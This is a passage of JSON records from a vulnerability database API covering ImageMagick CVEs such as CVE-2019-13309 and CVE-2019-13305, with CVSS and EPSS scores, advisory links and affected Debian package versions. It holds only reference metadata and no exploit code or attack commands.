"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730337", "reference_id": "1730337", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730337" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13309" ], "risk_score": 2.4, "exploitability": "0.5", "weighted_severity": "4.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-46ey-s7sy-9qby" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/79202?format=api", "vulnerability_id": "VCID-4az8-8361-7bg2", "summary": "security update", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13305.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13305.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00131", "scoring_system": "epss", "scoring_elements": "0.32485", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00131", "scoring_system": "epss", "scoring_elements": "0.32639", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33148", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33182", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33012", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33056", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33086", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33089", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33051", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33027", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33068", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33046", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33017", "published_at": "2026-04-01T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730361", "reference_id": "1730361", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730361" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931452", "reference_id": "931452", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931452" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1036899?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.7.4%2Bdfsg-11%2Bdeb9u8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15mv-khzp-fqfk" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": 